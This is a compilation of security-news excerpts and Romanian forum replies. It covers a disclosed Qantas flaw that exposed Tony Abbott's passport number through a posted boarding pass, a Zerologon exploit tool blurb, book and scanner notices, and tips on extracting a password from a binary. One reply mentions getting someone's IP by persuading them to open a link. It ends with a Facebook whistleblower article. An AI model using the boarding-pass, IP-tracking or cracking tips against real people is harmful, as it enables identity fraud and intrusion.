of a shakas to you yeahhhhhhhhhh, nice So I guess I emailed the shakas gif to the government??? Yeah, I guess I did. Please find attached Can I write about this? I asked them if they could give me permission to write this blog post, or who to ask, and they were like “uhhhhhhhhhhh” and gave me two government media email addresses to try. Listen I don’t wanna be an “ummm they didn’t reply to my emAiLs” kinda person buT they simply left me no choice. Still, defending the Commonwealth was in ASD’s hands now, and that’s a win for me at this point. ☑️ figure out whether i have done a crime ☑️ notify someone (The Government) that this happened ⬜ get permission to publish this here blog post ⬜ tell qantas about the security issue so they can fix it Part 3: Telling Qantas the bad news The security issue Hey remember like fifteen minutes ago when this post was about webpages? I’m guessing Qantas didn’t want to send the customer their passport number, phone number, and staff comments about them, so I wanted to let them know their website was doing that. Maybe the website was well meaning, but ultimately caused more harm than good, like how that time the bike path railings on the Golden Gate Bridge accidentally turned it into the world’s largest harmonica. Unblending the smoothie But why does the website even send you all that stuff in the first place? I don’t know, but to speculate wildly: Maybe the website just sends you all the data it knows about you, and then only shows you your name, flight times, etc, while leaving the passport number etc. still in the page. If that were true, then Qantas would want to unblend the digital smoothie they’ve sent you, if you will. They’d want to change it so that they only send you your name and flight times and stuff (which are a key ingredient of the smoothie to be sure), not the whole identity fraud smoothie. Smoothie evangelism I wanted to tell them the smoothie thing, but how do I contact them? The first place to check is usually company.com/security, maybe that’ll w- Okay nevermind Okay fine maybe I should just email security@qantas.com.au surely that’s it? I could only find a phone number to report security problems to, and I wasn’t sure if it was like…. airport security? So I just… called the number and was like “heyyyy uhhhh I’d like to report a cyber security issue?”, and the person was like “yyyyya just email security@qantas.com.au” and i was like “ok sorrY”. Time to email Qantas I guess I emailed Qantas, being like “beep boop here is how the computer problem works”. (Have you been wondering about the little dots in this post? Click this one for the rest of the email .) A few days later, I got this reply. And then I never heard from this person again Airlines were going through kinda a struggle at the time, so I guess that’s what happened? if ur still out there Shr Security i miss u Struggles After filling up my “get left on read” combo meter, I desperately resorted to calling Qantas’ secret media hotline number. They said the issue was being fixed by Amadeus, the company who makes their booking software, rather than with Qantas itself. I’m not sure if that means other Amadeus customers were also affected, or if it was just the way Qantas was using their software, or what. It’s common to give companies 90 days to fix the bug, before you publicly disclose it. It’s a tradeoff between giving them enough time to fix it, and people being hacked because of the bug as long as it’s out there. But, well, this was kinda a special case. Qantas was going through some #struggles, so it was taking longer. Lots of their staff were stood down, and the world was just generally more cooked. At the same time, hardly anybody was flying at the time, due to see above re: #struggles. So, I gave Qantas as much time as they needed. Five months later The world is a completely different place, and Qantas replies to me, saying they fixed the bug. It did take five months, which is why it took so long for you and I to be having this weird textual interaction right now. I don’t have a valid Booking Reference, so I can’t actually check what’s changed. I asked a friend to check (with an expired Booking Reference), and they said they didn’t see a mention of “documentNumber” anymore, which sounds like the passport number is no longer there. But That’s Not Science, so I don’t know for sure. I originally found the bug in March, which was about 60 years ago. BUT we got there baybee, Qantas emailed me saying the bug had been fixed on August 21. They later told me they actually fixed the bug in July, but the person I was talking to didn’t know about it until August. Qantas also said this when I asked them to review this post: Thanks again for letting us have the opportunity to review and again for refraining from posting until the fix was in place for vulnerability. Our standard advice to customers is not to post pictures of the boarding pass, or to at least obscure the key personal information if they do, because of the detail it contains. We appreciate you bringing it to our attention in such a responsible way, so we could fix the issue, which we did a few months ago now. I couldn’t find any advice on their website about not posting pictures of customer boarding passes, only news articles about how Qantas stopped printing the Frequent Flyer number on the boarding pass last year, because… well, you can see why. I also asked Qantas what they did to fix the bug, and they said: Unfortunately we’re not able to provide the details of fix as it is part of the protection of personal information. ☑️ figure out whether i have done a crime ☑️ notify someone (The Government) that this happened ⬜ get permission to publish this here blog post ☑️ tell qantas about the security issue so they can fix it Part 4: Finding Tony Abbott Like 2003’s Finding Nemo, this section was an emotional rollercoaster. The government was presumably helping Tony Abbott reset his passport number, and making sure his current one wasn’t being used for any of that yucky identity fraud. But, much like Shannon Noll’s 2004 What About Me?, what about me? I really wanted to write a blog post about it, you know? So I could warn people about the non-obvious risk of sharing their boarding passes, and also make dumb and inaccessible references to the early 2000s. The government people I talked to couldn’t give me permission to write this post, so rather than willingly wandering deeper into the procedurally generated labyrinth of government department email addresses (it’s dark in there), I tried to find Tony Abbott or his staff directly. Calling everybody in Australia one by one I called Tony Abbott’s former political party again, and asked them how to contact him, or his office, or something I’m really having a moment rn. They said they weren’t associated with him anymore, and suggested I call Parliament House, like I was the Queen or something. In case you don’t know it, Parliament House is sorta like the White House, I think? The Prime Minister lives there and has a nice little garden out the back with a macadamia tree that never runs out, and everyone works in different colourful sections like “Making it so Everyone Gets a Fair Shake of the Sauce Bottle R&D” and “Mateship” and they all wear matching uniforms with lil kangaroo and emu hats, and they all do a little dance every hour on the hour to celebrate another accident-free day in the Prime Minister’s chocolate factory. calling parliament house i guess Not really sure what to expect, I called up and was all like “yeah bloody g’day, day for it ay, hot enough for ya?”. Once the formalities were out of the way, I skipped my usual explanation of why I was calling and just asked point-blank if they had Tony Abbott’s contact details. The person on the phone was casually like “Oh, no, but I can put you through to the Serjeant-at-arms, who can give you the contact details of former members”. I was like “…..okay?????”. Was I supposed to know who that was? Isn’t a Serjeant like an army thing? But no, the Serjeant-at-arms was just a nice lady who told me “he’s in a temporary office right now, and so doesn’t have a phone number. I can give you an email address or a P.O. box?”. I was like “ok th-thank you your majesty”. It felt a bit weird just…. emailing the former PM being like “boy do i have bad news for you”, but I figured he probably wouldn’t read it anyway. If it was that easy to get this email address, everyone had it, and so nobody was likely to be reading the inbox. Spoilers: It didn’t work. Finding Tony Abbott’s staff I roll out of bed and stare bleary-eyed into the morning sun, my ultimate nemesis, as Day 40 of not having found Tony Abbott’s staff begins. This time for sure. Retinas burning, in a moment of determination/desperation/hubris, I went and asked even more people that might know how to contact Tony Abbott’s staff. I asked a journalist friend, who had the kind of ruthlessly efficient ideas that come from, like, being a professional journalist. They suggested I find Tony Abbott’s former staff from when he was PM, and contact their offices and see if they have his contact details. It was a strange sounding plan to me, which I thought meant it would definitely work. Wikipedia stalking Apparently Prime Ministers themselves have “ministers” (not prime), and those are their staff. That’s who I was looking for. Big “me and the boys” energy Okay but, the problem was that most of these people are retired now, and the glory days of 2013 are over. Each time I hover over one of their names, I see “so-and-so is a former politician and….” and discard their Wikipedia page like a LeSnak wrapper into the wind. Eventually though, I saw this minister. Oh he definitely has an office. That’s the current Prime Minister of Australia (at the time of writing, that is, for all I know we’re three Prime-Ministers deep into 2020 by the time you read this), you know he’s definitely gonna be easier to find. Let’s call the Prime Minister’s office I guess? Easy google of the number, absolutely no emotional journey resulting in my growth as a person this time. When I call, I hear what sounds like two women laughing in the background? One of them answers the phone, slightly out of breath, and says “Hello, Prime Minister’s office?”. I’m like “….hello? Am I interrupting something???”. I clumsily explain that I know this is Scott Morrison’s office, but I actually was wondering if they had Tony Abbott’s contact details, because it’s for “a time-sensitive media enquiry”, and I j- She interrupts to explain “so Tony Abbott isn’t Prime Minister anymore, this is Scott Morrison’s office” and I’m like “yA I know please I am desperate for these contact details”. She says “We wouldn’t have that information but I’ll just check for you” and then pauses for like, a long time? Like 15 seconds? I can only wonder what was happening on the other end. Then she says “Oh actually I can give you Tony Abbott’s personal assistant’s number? Is that good?”. Ummmm YES thanks that’s what I’ve been looking for this whole time? Anyway brb i gotta go be uh a journalist or something. Calling Tony Abbott’s personal assistant’s personal assistant I fumble with my phone, furiously trying to dial the number. I ask if I’m speaking to Tony Abbott’s personal assistant. The person on the other end says no, but he is one of Tony Abbott’s staff. It has been a long several months of calling people. The cold ice is starting to thaw. One day, with enough therapy, I may be able to gather the emotional resources necessary to call another government phone number. I explain the security issue I want to report, and midway through he interrupts with “sorry…. who are you and what’s the organisation you’re calling from?” and I’m like “uhhhh I mean my name is Alex and uhh I’m not calling from any organisation I’m just like a person?? I just found this thing and…”. The person is mercifully forgiving, and says that he’ll have to call me back. I stress once again that I’m calling to help them, happy to wait to publish until they feel comfortable, and definitely do not warrant the bulk-installation of antivirus products. Calling Tony Abbott’s personal assistant An hour later, I get a call from a number I don’t recognise. He explains that the guy I talked to earlier was his assistant, and he’s Tony Abbott’s PA. Folks, we made it. It’s as easy as that. He says he knows what I’m talking about. He’s got the emails. He’s already in the process of getting Tony Abbott a new passport number. This is the stuff. It’s all coming together. I ask if I can publish a blog post about it, and we agree I’ll send a draft for him to review. And then he says “These things do interest him - he’s quite keen to talk to you” I was like exCUSE me? Tony Abbott, Leader of the 69th Ministry of Australia, wants to call me on the phone? I suppose I owe this service to my country? This story was already completely cooked so sure, whatever. I’d already declared emotional bankruptcy, so nothing was coming as a surprise at this point. I asked what he wanted to talk about. “Just to pick your brain on these things”. We scheduled a call for 3:30 on Monday. And then Tony Abbott just… calls me on the phone? Mostly, he wanted to check whether his understanding of how I’d found his passport number was correct (it was). He also wanted to ask me how to learn about “the IT”. He asked some intelligent questions, like “how much information is in a boarding pass, and what do people like me need to know to be safe?”, and “why can you get a passport number from a boarding pass, but not from a bus ticket?”. The answer is that boarding passes have your password printed on them, and bus tickets don’t. You can use that password to log in to a website (widely regarded as a bad move), and at that point all bets are off, websites can just do whatever they want. He was vulnerable, too, about how computers are harder for him to understand. “It’s a funny old world, today I tried to log in to a [Microsoft] Teams meeting (Teams is one of those apps), and the fire brigade uses a Teams meeting. Anyway I got fairly bamboozled, and I can now log in to a Teams meeting in a way I couldn’t before. It’s, I suppose, a terrible confession of how people my age feel about this stuff.” Then the Earth stopped spinning on its axis. For an instant, time stood still. Then he said it: “You could drop me in the bush and I’d feel perfectly confident navigating my way out, looking at the sun and direction of rivers and figuring out where to go, but this! Hah!” This was possibly the most pure and powerful Australian energy a human can possess, and explains how we elected our strongest as our leader. The raw energy did in fact travel through the phone speaker and directly into my brain, killing me instantly. When I’d collected myself from various corners of the room, he asked if there was a book about the basics of IT, since he wanted to learn about it. That was kinda humanising, since it made me realise that even famous people are just people too. Anyway I hadn’t heard of a book that was any good, so I told a story about my mum instead. A story about my mum instead I said there probably was a book out there about “the basics of IT”, but it wouldn’t help much. I didn’t learn from a book. 13 year old TikTok influencers don’t learn from a book. They just vibe. My mum always said when I was growing up that: There were “too many buttons” She was afraid to press the buttons, because she didn’t know what they did I can understand that, since grown ups don’t have the sheer dumb hubris of a child, and that’s what makes them afraid of the buttons. Like, when a toddler uses a spoon for the first time, they don’t know what a spoon is, where they are, or who the current Prime Minister is. But they see the spoon, and they see the cereal, and their dumb baby brain is just like “yeA” and they have a red hot go. And like, they get it wrong the first few times, but it doesn’t matter, because they don’t know to be afraid of getting it wrong. So eventually, they get it right. leaked footage of me learning how to hack Okay so I didn’t tell the spoon thing to Tony Abbott, but I did tell him what I always told my mum, which was: “Mum you just gotta press all the buttons, to find out what they do”. He was like “Oh, you just learn by trial and error”. Exactly! Now that I think about it, it’s a bit scary. We are dumb babies learning to use a spoon for the first time, except if you do it wrong some clown writes a blog post about you. Anyway good luck out there to all you big babies. Asking to publish this blog post When I asked Tony Abbott for permission to publish the post you are reading right now while neglecting your responsibilities, he said “well look Alex, I don’t have a problem with it, you’ve alerted me to something I probably should have known about, so if you wanna do that, go for it”. At the end of the call, he said “If there’s ever anything you think I need to know, give us a shout”. Look you gotta hand it to him. That’s exactly the right way to respond when someone tells you about a security problem. Back at the beginning, I was kinda worried that he might misunderstand, and think I was trying to hack him or something, and that I’d be instantly slam dunked into jail. But nope, he was fine with it. And now you, a sweet and honourable blog post browser, get to learn the dangers of posting your boarding pass by the realest of real-world examples. During the call, I was completely in shock from the lost in the bush thing killing me instantly, and so on. But afterwards, when I looked at the quotes, I realised he just wanted to understand what had happened to him, and more about how technology works. That’s the same kind of curiosity I had, that started this whole surrealist three-act drama. That… wasn’t really what I was expecting from Tony Abbott, but it’s what I found. The point of this story isn’t to say “wow Tony Abbott got hacked, what a dummy”. The point is that if someone famous can unknowingly post their boarding pass, anyone can. Anyway that’s why I vote right wing now baybeeeee. ☑️ figure out whether i have done a crime ☑️ notify someone (The Government) that this happened ☑️ get permission to publish this here blog post ☑️ tell qantas about the security issue so they can fix it Act 3: Closing credits Wait no what the heck did I just read Yeah look, reasonable. tl; dr Your boarding pass for a flight can sometimes be used to get your passport number. Don’t post your boarding pass or baggage receipt online, keep it as secret as your passport. How it works The Booking Reference on the boarding pass can be used to log in to the airline’s “Manage Booking” page, which sometimes contains the passport number, depending on the airline. I saw that Tony Abbott had posted a photo of his boarding pass on Instagram, and used it to get his passport details, phone number, and internal messages between Qantas flight staff about his flight booking. Why did you do this? One day, my friend who was also in “the group chat” said “I was thinking…. why didn’t I hack Tony Abbott? And I realised I guess it’s because you have more hubris”. I was deeply complimented by this, but that’s not the point. The point is that you, too, can have hubris. You know how they say to commit a crime (which once again I insist did not happen in my case) you need means, motive, and opportunity? Means is the ability to use right click > Inspect Element, motive is hubris, and opportunity is the dumb luck of having my friend message me the Instagram post. I know, I’ve been saying “hubris” a lot. I mean “the willingness to risk breaking the rules”. Now hold up, don’t go outside and do crimes (unless it’s really funny). I’m not talking about breaking the law, I’m talking about rules we just follow without realising, like social rules and conventions. Here’s a simple example. You’re at a sufficiently fancy restaurant, like I dunno, with white tablecloths or something? The waiter asks if you’d like “still or sparkling water?” If you say “still”, it costs Eleven Dollars. If you say “sparkling”, it costs Eleven Dollars and tastes all gross and fizzy. But if you say “tap water, please”, you just get tap water, what you wanted in the first place? When I first saw someone do this I was like “you can do that? I just thought you had to pay Eleven Dollars extra at fancy restaurants!”. It’s not written down anywhere that you can ask for tap water. But when I found out you could do that, and like, nothing bad happens, I could suddenly do it too. Miss me with that Eleven Dollars fizzy water. Basically, until you’ve broken the rules, the idea that the rules can be broken might just not occur to you. That’s how it felt for me, at least. In conclusion, to be a hacker u ask for tap water. FAQ Why is it bad for someone else to have your passport number? Hey crime gang, welcome back to Identity Fraud tips and tricks with Alex. A passport is government-issued ID. It’s how you prove you’re you. The fact that you have your passport and I don’t is how you prevent me from convincing the government that I’m you and doing crimes in your name. Just having the information on the passport is not quite as powerful as a photo of the full physical passport, with your photo and everything. With your passport number, someone could: Book an international flight as you. Apply for anything that requires proof of identity documentation with the government, e.g. Working with children check Activate a SIM card (and so get an internet connection that’s traceable to you, not them, hiding them from the government) Create a fake physical passport from a template, with the correct passport number (which they then use to cross a border, open a bank account, or anything) who knows what else, not me, bc i have never done a crime Am I a big bozo, a big honking goose, if I post my boarding pass on Instagram? Nah, it’s an easy mistake to make. How are you supposed to know not to? It’s not obvious that your boarding pass is secret, like a password. I think it’s on the airline to inform you on the risks you’re taking when you use their stuff. But now that you’ve read this blog post, I regret to inform you that you will in fact be an entire sack of geese if you go and post your boarding pass now. When did all of this happen? March 22 - @hontonyabbott posts a picture of a boarding pass and baggage receipt. I log in to the website and get the passport number, phone number, and internal Qantas comments. March 24 - I contact the Australian Signals Directorate (ASD) and let them know what happened. March 27 - ASD tells me their investigation is complete, I send them a shakas gif, and they thank me for being a good citizen. March 29 - I learn from lawyers that I have not done a crime 💯 March 30 - I contact Qantas and tell them about the vulnerability. May 1 - Tony Abbott calls me, we chat about being dropped in the middle of the bush. July 17 - Paper Mario: The Origami King is released for Nintendo Switch. August 21 - Qantas emails me saying the security problem has been fixed. September 13 - Various friends finish reviewing this post ❤️ September 15 - Tony Abbott and Qantas review this post. Today - You read this post instead of letting it read you, nice job you. I’m bored and tired Let me answer that question,,, with a question. Maybe try drinking some water you big goose. Honk honk, I’m so dehydrated lol. That’s you. honk honk honk honl Yeah, exactly. I wrote this because I can’t go back to the Catholic church ever since they excommunicated me in 1633 for insisting the Earth revolves around the sun. You can talk to me about it by sliding into my DMs in the tweet zone or, if you must, email. Sursa; https://mango.pdf.zone/finding-former-australian-prime-minister-tony-abbotts-passport-number-on-instagram

Zer0Dump Zer0dump is an PoC exploit/tool for abusing the vulnerabilities associated with CVE-2020-1472 (Zerologon) in order to initiate a full system takeover of an unpatched Windows domain controller. Special thanks to @dirkjanm and @SecureAuthCorp Sursa: https://github.com/bb00/zer0dump

Security Engineering — Third Edition I'm writing a third edition of Security Engineering, which will be published in November 2020. With both the first edition in 2001 and the second edition in 2008, I put six chapters online for free at once, then added the others four years after publication. For the third edition, I negotiated an agreement with the publishers to put the chapters online for review as I wrote them. So the book came out by instalments over 2019-20, like Dickens' novels. Once the manuscript goes to press at the end of September 2020, all except seven sample chapters will disappear for a period of 42 months. I'm afraid the publishers insist on that. But therearefter the whole book will be free online forever. You may pre-order the paper book here for delivery at the end of November in the USA and here for delivery in January 2021 in the UK. Here are the chapters I've put online for review so far: Preface Chapter 1: What is Security Engineering? Chapter 2: Who is the Opponent? Chapter 3: Psychology and Usability Chapter 4: Protocols Chapter 5: Cryptography Chapter 6: Access Control Chapter 7: Distributed Systems Chapter 8: Economics Chapter 9: Multilevel Security Chapter 10: Boundaries Chapter 11: Inference Control Chapter 12: Banking and Bookkeeping Chapter 13: Physical Protection Chapter 14: Monitoring and Metering Chapter 15: Nuclear Command and Control Chapter 16: Security Printing and Seals Chapter 17: Biometrics Chapter 18: Physical Tamper Resistance Chapter 19: Side Channels Chapter 20: Advanced Cryptographic Engineering Chapter 21: Network Attack and Defence Chapter 22: Phones Chapter 23: Electronic and Information Warfare Chapter 24: Copyright and DRM Chapter 25: Taking Stock (1 Sep) Chapter 26: Surveillance or Privacy? Chapter 27: Secure Systems Development Chapter 28: Assurance and Sustainability Chapter 29: Beyond 'Computer Says No' (1 Sep) Bibliography If you see anything wrong or missing, or you think some aspect of any chapter topic isn't covered adequately, please email me at Ross dot Anderson at cl dot cam dot ac dot uk. This approach was inspired by the collaborative authorship model pioneered by my late friend and colleague David MacKay for his great books on sustainable energy and coding theory. I made a video for the launch, which you can watch here. For comments, see our blog here, Bruce Schneier's blog here and El Pais here. Sursa; https://www.cl.cam.ac.uk/~rja14/book.html

Whalescan Released as open source by NCC Group Plc - https://www.nccgroup.com/ Developed by Saira Hassan (@saiii_h) https://github.com/nccgroup/whalescan Released under Apache license 2.0, see LICENSE for more information Introduction Whalescan is a vulnerability scanner for Windows containers, which performs several benchmark checks, as well as checking for CVEs/vulnerable packages on the container. It also checks the config and Docker files for misconfigurations. This tool can be used as part of a Windows container review on local copies of the containers, and on the host itself to enhance security. Getting Started git clone https://github.com/saira-h/whalescan pip install -r requirements.txt ./main.py Overview Whalescan performs the following checks on containers: Container checks Checks if containers are stored under 😄 drive - this could raise issues if there is a DoS attack, filling up the 😄 drive and making the host unresponsive Checks if container is running as a process or hyper-v. Hyper-v isolation offers enhanced security of containers Checks if there are any pending updates in the containers, and if so, how to update. Image checks Checks for unsafe commands being used in the dockerfile, for example docker ADD instead of docker COPY. Checks if hash verification is being performed on any files downloaded. Checks if any vulnerable packages are on the container, and pulls relevant CVE information Checks if .NET version being used is End Of Life Checks if Docker Engine is updated, and if not, gathers a list of CVEs for the version being used Checks permissions of docker configuration files Checks if additional devices have been mapped to containers Sursa; https://github.com/nccgroup/whalescan

Atunci e mai nasol decat ma asteptam. Dar pana la urma nu e nevoie sa gaseasca parola daca vrea doar fisierele. Ar trebui sa incerce Process Monitor sa se uite la scrierile de fisiere, e posibil sa fie scrise undeva in %TEMP%. Daca se face totul din memorie, teoretic e nasol, practic tot se pot pune breakpoint-uri pe WriteFile(Ex) sau chiar NtWriteFile si acolo sa se poata vedea continutul fisierelor.

Nu stiu daca este legal sau ilegal dar nu cred ca se poate direct cu un pixel/imagine pe chat deoarece Instagram, Facebook, Twitter si alte platforme au "protectie" impotriva acestor lucruri si nu browser-ul userului o sa faca request catre acel pixel/imagine ci backendul platformei. Daca chiar vrei ceva sa mearga ii trimiti un link cu ceva si un mesaj prin care convingi persoana sa il deschida. Daca face asta ii poti afla IP-ul. Acum vine intrebarea: ce faci cu IP-ul? Nu mai sunt vremurile de acum X ani in care la "whois" sa vezi adresa de acasa a cuiva. Si un IP e probabil folosit de multe persoane. Nu cred ca ajuta prea mult. Care este de fapt ideea? Adica de ce ai vrea sa faci asta? Ma gandesc la cazul in care "ai o problema" cu acea persoana si sincer solutia e mai simpla: discuti cu ea si rezolvi problema, suntem oameni.

Salut, incearca in primul rand sa deschizi aplicatia intr-un editor de text ca Notepad++ si sa te uiti prin ea, e posibil sa vezi parola acolo. Ceva mai practic ar fi sa rulezi un utilitar "strings" (Linux sau Windows) care ia automat stringurile unde poate fi si parola. Poti vedea activitatea binarului dar acea decryptare PROBABIL o sa se faca in memorie. Insa nu m-ar mira sa ruleze un binar in linie de comanda in care sa apara si parola, deci o solutie gen Process Monitor cum a mentionat si @gigiRoman ar putea fi foarte utila. Daca nu merg astea, probabil aplicatia trebuie deschisa intr-un debugger ca x64dbg. Daca e ceva mai simplu, se poate vedea lista de librarii importate (DLL-uri) si se pot pune breakpoint-uri pe functiile de deschidere Zip-uri care probabil au parola ca unul dintre parametri. Daca e linkat static e mai nasol. In principiu se poate, dar cam astia ar fi pasii de la mai simplu la mai complicat de incercat.

Deci acela e un Sandboxie bypass? Nu am vazut fisierul care s-a trimis. Conexiunile nu vad de ce ar fi limitate, nu mi se pare o problema asta. English?

WinRM e un serviciu care poate rula pe mai toate Windows-urile cu Powershell. Foloseste HTTP (nu se transmit date clear-text ci doar foloseste HTTP ca protocol) pe portul 5985 si HTTPS pe portul 5986. Acest serviciu asculta pe acele porturi si sysadminii se pot conecta, loga si executa scripturi/comenzi Powershell. Web-Proxy e folosit cand de pe un PC vrei sa te conectezi undeva pe Internet (si cum ziceam, poate fi bypassat by design daca e cel setat in Windows). Sysadmin -- WinRM --> PC pe care are treaba -- HTTP via web proxy --> Site-urile pe care intra userul acelui PC

Nu e degeaba, e o alternativa la psexec (care e detectabil). WinRM e folosit de catre sysadmin (in mod oficial) pentru managementul sistemelor Windows folosind PowerShell asa cum SSH si bash sunt folosite pe Linux. Ce face de fapt e cam acelasi lucru, creeaza un scheduled task prin care ruleaza ca SYSTEM ce vrei tu. Desigur, necesita privilegile necesare. Nu "iesi cu procese de sistem spre Internet" - oricum nu exista o astfel de limitare. In plus, la nivel de sistem de operare se poate seta un proxy global dar nu e obligatoriu ca aplicatiile (orice fel, fie ca ruleaza sub user obisnuit fie ca ruleaza ca servicii gen SYSTEM) sa tina cont de ele. Exista functii din Windows care tin automat cont de ele, dar daca o aplicatie creeaza manual un socket si il conecteaza la un IP din Internet, nu o sa tina cont de acea setare.

Da, Wordpress foloseste prepared statements (lucru care nu e valabil si pentru toate template-urile si plugin-urile), cred ca doar a fost folosit pentru teste cand a fost scris articolul, ca sa fie mai usor de inteles.

“I’ve found multiple blatant attempts by foreign national governments to abuse our platform on vast scales to mislead their own citizenry, and caused international news on multiple occasions. I have personally made decisions that affected national presidents without oversight, and taken action to enforce against so many prominent politicians globally that I’ve lost count.” “I Have Blood on My Hands”: A Whistleblower Says Facebook Ignored Global Political Manipulation A 6,600-word internal memo from a fired Facebook data scientist details how the social network knew leaders of countries around the world were using their site to manipulate voters — and failed to act. Craig Silverman BuzzFeed News Reporter Ryan Mac BuzzFeed News Reporter Pranav Dixit BuzzFeed News Reporter Posted on September 14, 2020, at 3:36 p.m. ET Facebook ignored or was slow to act on evidence that fake accounts on its platform have been undermining elections and political affairs around the world, according to an explosive memo sent by a recently fired Facebook employee and obtained by BuzzFeed News. The 6,600-word memo, written by former Facebook data scientist Sophie Zhang, is filled with concrete examples of heads of government and political parties in Azerbaijan and Honduras using fake accounts or misrepresenting themselves to sway public opinion. In countries including India, Ukraine, Spain, Brazil, Bolivia, and Ecuador, she found evidence of coordinated campaigns of varying sizes to boost or hinder political candidates or outcomes, though she did not always conclude who was behind them. “In the three years I’ve spent at Facebook, I’ve found multiple blatant attempts by foreign national governments to abuse our platform on vast scales to mislead their own citizenry, and caused international news on multiple occasions,” wrote Zhang, who declined to talk to BuzzFeed News. Her LinkedIn profile said she “worked as the data scientist for the Facebook Site Integrity fake engagement team” and dealt with “bots influencing elections and the like.” Advertisement Kenzo Tribouillard / Getty Images Facebook CEO Mark Zuckerberg in Brussels, Feb. 17, 2020. “I have personally made decisions that affected national presidents without oversight, and taken action to enforce against so many prominent politicians globally that I’ve lost count,” she wrote. Advertisement The memo is a damning account of Facebook’s failures. It’s the story of Facebook abdicating responsibility for malign activities on its platform that could affect the political fate of nations outside the United States or Western Europe. It's also the story of a junior employee wielding extraordinary moderation powers that affected millions of people without any real institutional support, and the personal torment that followed. “I know that I have blood on my hands by now,” Zhang wrote. These are some of the biggest revelations in Zhang’s memo: It took Facebook’s leaders nine months to act on a coordinated campaign “that used thousands of inauthentic assets to boost President Juan Orlando Hernandez of Honduras on a massive scale to mislead the Honduran people.” Two weeks after Facebook took action against the perpetrators in July, they returned, leading to a game of “whack-a-mole” between Zhang and the operatives behind the fake accounts, which are still active. In Azerbaijan, Zhang discovered the ruling political party “utilized thousands of inauthentic assets... to harass the opposition en masse.” Facebook began looking into the issue a year after Zhang reported it. The investigation is ongoing. Zhang and her colleagues removed “10.5 million fake reactions and fans from high-profile politicians in Brazil and the US in the 2018 elections.” In February 2019, a NATO researcher informed Facebook that "he’d obtained Russian inauthentic activity on a high-profile U.S. political figure that we didn’t catch." Zhang removed the activity, “dousing the immediate fire,” she wrote. In Ukraine, Zhang “found inauthentic scripted activity” supporting both former prime minister Yulia Tymoshenko, a pro–European Union politician and former presidential candidate, as well as Volodymyr Groysman, a former prime minister and ally of former president Petro Poroshenko. “Volodymyr Zelensky and his faction was the only major group not affected,” Zhang said of the current Ukrainian prime minister. Zhang discovered inauthentic activity — a Facebook term for engagement from bot accounts and coordinated manual accounts— in Bolivia and Ecuador but chose “not to prioritize it,” due to her workload. The amount of power she had as a mid-level employee to make decisions about a country’s political outcomes took a toll on her health. After becoming aware of coordinated manipulation on the Spanish Health Ministry’s Facebook page during the COVID-19 pandemic, Zhang helped find and remove 672,000 fake accounts “acting on similar targets globally” including in the US. In India, she worked to remove “a politically-sophisticated network of more than a thousand actors working to influence" the local elections taking place in Delhi in February. Facebook never publicly disclosed this network or that it had taken it down. “We’ve built specialized teams, working with leading experts, to stop bad actors from abusing our systems, resulting in the removal of more than 100 networks for coordinated inauthentic behavior," Facebook spokesperson Liz Bourgeois said in a statement. "It’s highly involved work that these teams do as their full-time remit. Working against coordinated inauthentic behavior is our priority, but we’re also addressing the problems of spam and fake engagement. We investigate each issue carefully, including those that Ms. Zhang raises, before we take action or go out and make claims publicly as a company." BuzzFeed News is not publishing Zhang’s full memo because it contains personal information. This story includes full excerpts when possible to provide appropriate context. In her post, Zhang said she did not want it to go public for fear of disrupting Facebook’s efforts to prevent problems around the upcoming 2020 US presidential election, and due to concerns about her own safety. BuzzFeed News is publishing parts of her memo that are clearly in the public interest. “I consider myself to have been put in an impossible spot – caught between my loyalties to the company and my loyalties to the world as a whole,” she said. “The last thing I want to do is distract from our efforts for the upcoming U.S. elections, yet I know this post will likely do so internally.” Zhang said she turned down a $64,000 severance package from the company to avoid signing a nondisparagement agreement. Doing so allowed her to speak out internally, and she used that freedom to reckon with the power that she had to police political speech. “There was so much violating behavior worldwide that it was left to my personal assessment of which cases to further investigate, to file tasks, and escalate for prioritization afterwards,” she wrote. That power contrasted with what she said seemed to be a lack of desire from senior leadership to protect democratic processes in smaller countries. Facebook, Zhang said, prioritized regions including the US and Western Europe, and often only acted when she repeatedly pressed the issue publicly in comments on Workplace, the company’s internal, employee-only message board. "Most of the world outside the West was effectively the Wild West with myself as the part-time dictator." “With no oversight whatsoever, I was left in a situation where I was trusted with immense influence in my spare time,” she wrote. “A manager on Strategic Response mused to myself that most of the world outside the West was effectively the Wild West with myself as the part-time dictator – he meant the statement as a compliment, but it illustrated the immense pressures upon me.” A former Facebook engineer who knew her told BuzzFeed News that Zhang was skilled at discovering fake account networks on the platform. “She's the only person in this entire field at Facebook that I ever trusted to be earnest about this work," said the engineer, who had seen a copy of Zhang’s post and asked not to be named because they no longer work at the company. “A lot of what I learned from that post was shocking even to me as someone who's often been disappointed at how the company treats its best people," they said. Zhang’s memo said the lack of institutional support and heavy stakes left her unable to sleep. She often felt responsible when civil unrest took hold in places she didn’t prioritize for investigation and action. “I have made countless decisions in this vein – from Iraq to Indonesia, from Italy to El Salvador,” she wrote. “Individually, the impact was likely small in each case, but the world is a vast place.” Still, she did not believe that the failures she observed during her two and a half years at the company were the result of bad intent by Facebook’s employees or leadership. It was a lack of resources, Zhang wrote, and the company’s tendency to focus on global activity that posed public relations risks, as opposed to electoral or civic harm. “Facebook projects an image of strength and competence to the outside world that can lend itself to such theories, but the reality is that many of our actions are slapdash and haphazard accidents,” she wrote. “We simply didn’t care enough to stop them” Zhang wrote that she was just six months into the job when she found coordinated inauthentic behavior — Facebook’s internal term for the use of multiple fake accounts to boost engagement or spread content — benefiting Honduran President Juan Orlando Hernández. Orlando Sierra / Getty Images Two children watch a television screen as Honduran President Juan Orlando Hernández speaks on June 16, 2020. Advertisement The connection to the Honduran leader was made, Zhang said, because an administrator for the president’s Facebook page had been “happily running hundreds of these fake assets without any obfuscation whatsoever in a show of extreme chutzpah.” The data scientist said she reported the operation, which involved thousands of fake accounts, to Facebook’s threat intelligence and policy review teams, both of which took months to act. “Local policy teams confirmed that President JOH’s marketing team had openly admitted to organizing the activity on his behalf,” she wrote. “Yet despite the blatantly violating nature of this activity, it took me almost a year to take down his operation.” That takedown was announced by Facebook in July 2019, but proved futile. Soon, the operation was soon back up and running, a fact Facebook has never disclosed. “They had returned within two weeks of our takedown and were back in a similar volume of users,” Zhang wrote, adding that she did a final sweep for the fake accounts on her last day at Facebook. “A year after our takedown, the activity is still live and well.” Advertisement In Azerbaijan, she found a large network of inauthentic accounts used to attack opponents of President Ilham Aliyev of Azerbaijan and his ruling New Azerbaijan Party, which uses the acronym YAP. Facebook still has not disclosed the influence campaign, according to Zhang. The operation detailed in the memo is reminiscent of those of Russia’s Internet Research Agency, a private troll farm that tried to influence the 2016 US elections, because it 